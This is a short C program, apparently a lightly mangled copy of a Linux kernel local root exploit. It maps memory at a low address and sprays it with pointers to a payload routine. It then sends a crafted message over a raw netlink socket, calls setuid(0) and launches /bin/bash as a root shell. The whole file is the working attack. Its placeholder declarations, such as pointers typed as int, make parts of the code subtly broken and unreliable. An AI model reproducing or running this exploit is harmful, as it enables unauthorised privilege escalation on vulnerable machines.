
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int n ;


 int assert (int) ;
 int execl (char*,char*,int ) ;
 long getgid () ;
 long getuid () ;
 int memcpy (int,int *,int) ;
 int mmap (void*,int,int,int,int ,int ) ;
 int patch_current ;
 int send (int,int*,int,int ) ;
 int setresgid (long,long,long) ;
 int setresuid (long,long,long) ;
 int setuid (int ) ;
 int socket (int,int,int) ;
 long ugid ;

int main()
{
  long u = getuid();
  long g = getgid();
  int i, f = socket(16,3,4);
  static int n[10] = {40,0x10014,0,0,45,-1};

  assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);

  setresuid(u,u,u); setresgid(g,g,g);
  ugid = (g<<32)|u;

  memcpy(1<<12, &patch_current, 1024);
  for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
  send(f, n, sizeof(n), 0);
  setuid(0);
  return execl("/bin/bash", "-sh", 0);
}
